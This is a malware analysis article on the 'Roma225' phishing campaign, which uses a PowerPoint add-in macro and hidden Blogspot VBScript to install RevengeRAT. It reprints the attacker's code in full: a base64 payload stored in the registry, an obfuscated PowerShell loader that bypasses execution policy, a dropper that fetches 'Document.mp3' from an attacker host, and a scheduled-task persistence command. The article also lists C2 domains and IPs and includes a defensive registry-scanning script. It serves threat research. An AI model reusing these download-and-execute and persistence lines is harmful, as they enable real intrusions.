‘Roma225’: the Cybaze-Yoroi ZLab researchers investigated a recent espionage malware implant weaponized to target companies in the automotive sector.

The malware was spread through a well-written phishing email impersonating a senior partner of one of the major Brazilian business law firms, “Veirano Advogados”.

The malicious email intercepted during the CSDC operations contains a PowerPoint add-in document (“.ppa” extension) armed with VBA macro code that runs automatically when the file is opened.

Figure 1. Popup displayed at the .ppa file opening

Technical analysis

The macro code in the .ppa file contains a single instruction that invokes the “mshta.exe” tool to download and execute the next stage of the dropper, retrieved from “hxxps://minhacasaminhavidacdt.blogspot[.]com/”.

Figure 2. Macro extracted from .ppa document

The Blogspot-hosted web page downloaded by mshta.exe looks innocent at a quick skim: opened in a browser, it renders as an unremarkable work-in-progress blog page.

Figure 3. Home page of the Blogger drop url

But a deeper inspection of its source code reveals an interesting snippet inserted into an invisible blog post: this ghost article contains VBScript code.

Figure 4. Visual Basic Script hidden behind the web page

Curiously, the malware author tried to attribute the script to “Microsoft Corp.” by pasting in comment lines taken from a legitimate Microsoft utility:

'Update------------------------------------------------------------
' Copyright: Microsoft Corp.

' This script is designed to be used only for scheduled tasks(s).
' There is no extensive error check, and will not dump the output from the Powershell CmdLet.

' Usage: SyncAppvPublishingServer {cmdline-args(passthrough to cmdlet)}

These comments are in fact part of the “SyncAppvPublishingServer” utility, commonly deployed on Windows 10 machines at “C:\Windows\System32\SyncAppvPublishingServer.vbs”. The remaining part of the script, however, is responsible for a series of malicious actions:

  • Store a base64-encoded version of the “RevengeRAT” payload in the registry value “HKCU\AppEvents\Values”
CreateObject("Wscript.Shell").regwrite "HKCU\AppEvents\Values", "TVqQAAMAAAAEAAAA//8AALgAAA.....[continue]" , "REG_SZ"
  • Decode and execute the stored payload
Set A0102030405 = CreateObject("WScript.Shell")
Dim CDT0908087CDT
CDT0908087CDT = "cmd." + "exe /C rundll32." + "exe javascript:""..mshtml,RunHTMLApplication "";document.write();h=new%20ActiveXObject(""WScript.Shell"").run(""cmd." + "exe /c power" + "shell -" + "Execution" + "Policy Bypass -windows" + "tyle hidden -noexit - [Reflection." + "Assembly]::Load([Convert]::FromBase64String((Get-ItemProperty HKCU:AppEvents).Values)).EntryPoint" + ".Invoke($N" + "ull,$" + "Null)"",0,true);" 
A0102030405.run CDT0908087CDT, vbHide
  • Create and execute another VBScript at “%AppData%\Local\Temp\Z3j.vbs”, capable of downloading a new payload from the remote destination “hxxp://cdtmaster.com[.]br”
Set XbonXo = CreateObject("WScript.Shell")
Dim XoowA83AC
XoowA83AC = "c" + "M" + "d /c cd %TEMP% &@echo Z6h = ""h" + "t" + "tp://cdtmaster.com.br/Document." + "mp3"">>Z3j.vbs &@echo M2l = M5t(""R]Qc[Sb<SfS"")>>Z3j.vbs &@echo Set M1s = CreateObject(M5t(""[af[[email protected]<f[ZVbb^""))>>Z3j.vbs &@echo M1s.Open M5t(""USb""), Z6h, False>>Z3j.vbs &@echo M1s.send ("""")>>Z3j.vbs &@echo Set E3i = CreateObject(M5t(""OR]RP<ab`SO[""))>>Z3j.vbs &@echo E3i.Open>>Z3j.vbs &@echo E3i.Type = 1 >>Z3j.vbs &@echo E3i.Write M1s.ResponseBody>>Z3j.vbs & @echo E3i.Position = 0 >>Z3j.vbs &@echo E3i.SaveToFile M2l, 2 >>Z3j.vbs &@echo E3i.Close>>Z3j.vbs  &@echo function M5t(N3y) >> Z3j.vbs &@echo For S2r = 1 To Len(N3y) >>Z3j.vbs &@echo E0k = Mid(N3y, S2r, 1) >>Z3j.vbs &@echo E0k = Chr(Asc(E0k)- 14) >>Z3j.vbs &@echo G3f = G3f + E0k >> Z3j.vbs &@echo Next >>Z3j.vbs &@echo M5t = G3f >>Z3j.vbs &@echo End Function >>Z3j.vbs& Z3j.vbs &dEl Z3j.vbs & timeout 2 & DOCUMENT.EXE"
XbonXo.Run XoowA83AC, vbHide
  • Finally, the creation of a new scheduled task that runs the “mshta.exe” utility again with the “hxxps://pocasideiascdt.blogspot[.]com/” parameter every two hours. This URL points to a web page that is actually a mirror of the “hxxps://minhacasaminhavidacdt.blogspot[.]com/” one.
Dim OUGo57658586GFFJHG
Set OUGo57658586GFFJHG = CreateObject("WScript.Shell")
asdmmmc= "c" + "Md /c Sc" + "hTa" + "sks /Cre" + "ate /sc MIN" + "UTE /MO 120 /TN OfficeData /TR ""m" + "sh" + "ta." + "exe h" + "ttp" + "s://pocasideiascdt.blogspot.com/"" /F "
OUGo57658586GFFJHG.Run asdmmmc, vbHide
self.close
Figure 5. Scheduled task for persistence

Summing up, the last stages of the infection chain install a RevengeRAT variant hidden in a registry key and run the “outlook.exe” executable extracted by the “Document.exe” binary, which is retrieved from “hxxp://cdtmaster.com[.]br/Document.mp3”.
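The registry hiding trick described above leaves a recognizable trace: a string value that decodes to a PE image (the “TVqQ” prefix in the snippet is simply “MZ\x90” in base64). The checker below is an added example, not code from the original analysis; it works on a plain dictionary standing in for the subkey's values, and the sample data is constructed.

```python
import base64, binascii, re, struct

# Base64 of "MZ" plus any third byte always starts with "TV" followed by one
# of "o", "p", "q", "r"; the page's payload starts with "TVqQ" = "MZ\x90".
_MZ_B64 = re.compile(r"^TV[o-r]")

def starts_like_mz(value: str) -> bool:
    """Cheap triage: does the base64 text begin like an encoded MZ header?"""
    return bool(_MZ_B64.match(value.strip()))

def decodes_to_pe(value: str) -> bool:
    """True if `value` is valid base64 whose decoded bytes look like a PE file."""
    try:
        blob = base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return False
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]   # offset of "PE\0\0"
    return blob[e_lfanew:e_lfanew + 4] == b"PE\0\0"

def scan_values(values: dict) -> list:
    """Names of REG_SZ-style values (name -> data) that embed a PE image."""
    return [name for name, data in values.items()
            if isinstance(data, str) and starts_like_mz(data) and decodes_to_pe(data)]

def _fake_pe() -> bytes:
    """Constructed minimal PE-shaped header for the demo, not a real binary."""
    hdr = bytearray(0x80)
    hdr[:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x40)   # e_lfanew -> offset 0x40
    hdr[0x40:0x44] = b"PE\0\0"
    return bytes(hdr)

# Constructed stand-in for the values under HKCU\AppEvents; only "Values" is bad.
SAMPLE_VALUES = {
    "Values": base64.b64encode(_fake_pe()).decode(),
    "ExampleSetting": "1",
    "Note": base64.b64encode(b"just some harmless text " * 4).decode(),
}

if __name__ == "__main__":
    print("suspicious values:", scan_values(SAMPLE_VALUES))
```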

The following image briefly shows the malware infection chain:

Figure 6. Roma225 infection chain

RevengeRAT Payload

Once executed, the RAT immediately contacts its command and control servers, sending the victim machine’s information. In the analyzed sample, the author configured two different C2 destinations: “office365update[.]duckdns.org” and “systen32.ddns[.]net”.

Figure 7. Configuration of the RevengeRAT

If one of these is down, the malware falls back to the other. At the time of writing both remote C2s were down, so it was only possible to emulate the server behavior in order to analyze the information sent by the RAT.

The malware establishes a TCP connection with the server and sends it the following stream:

Figure 8. RevengeRAT check-in

At first sight, it’s possible to spot a repeated sequence of characters used as a separator between the data fields:

roma225

This string was chosen by the attacker while preparing the malware, using the customization features of the RevengeRAT builder. Splitting the stream on it and decoding the fields makes the information clearer:

Figure 9. Decoded check-in data

As noted before, the C2s were unresponsive at the time of writing; however, their latest IP resolutions indicate that the attacker’s infrastructure could be spread across different countries.

For instance, the domain “office365update[.]duckdns.org” resolved to the 184.75.209.169 IP address, geolocated in Canada.


Moreover, “systen32.ddns[.]net” resolved to the 138.36.3.228 IP, geolocated in Brazil.


Document.exe


The “Document.exe” file is hosted at “cdtmaster.com[.]br” and is downloaded onto the victim machine by the “Z3j.vbs” script. This PE32 file is characterized by the Pokemon Megaball image used as its program icon, and its only purpose is to deploy and run the “Outlook.exe” payload.

Extracting static PE information from this last sample reveals references to the “SendBlaster” application, a program used to deliver newsletters. Here another interesting fact comes up: this product is currently developed by the Italian firm eDisplay Srl, which, in addition to the “roma225” separator, represents another direct reference to the Italian landscape.

Figure 10. Outlook.exe static information

When the “Outlook.exe” payload is executed it remains apparently quiet, with no outgoing network traffic or file system modifications; however, it binds a listening TCP socket on localhost: “tcp://127.0.0.1:49356”.

Cybaze-Yoroi ZLab researchers are still dissecting the Outlook.exe sample to extract its real behavior.

Conclusions

After this first analysis, it’s difficult to attribute the attack to a specific threat actor. In the past, RevengeRAT variants were also used by APT groups such as the Gorgon Group, the enigmatic threat actor tracked by Unit42 researchers and author of cyber espionage campaigns against UK, Spanish and US governmental organizations. However, the source code of the RAT was publicly leaked a few years ago and could be part of a multitude of cyber arsenals, more or less sophisticated.

Anyway, there are TTPs in common with the Unit42 report, such as the use of shared infrastructure (in this specific case the Blogger service) as drop server and of other popular RATs as the final backdoor (e.g. njRAT).

In fact, “cdtmaster.com[.]br” hosts other suspicious files, such as the “nj.mp3” binary, which is actually an njRAT variant. All the other files are still under investigation.

Figure 11. Malware hosted on cdtmaster.com[.]br

Technical details about the Roma225 campaign, including Indicators of Compromise (IoCs) and Yara rules, are reported in the analysis published on the Yoroi blog.

Pierluigi Paganini

(SecurityAffairs – Roma225, cyberespionage)
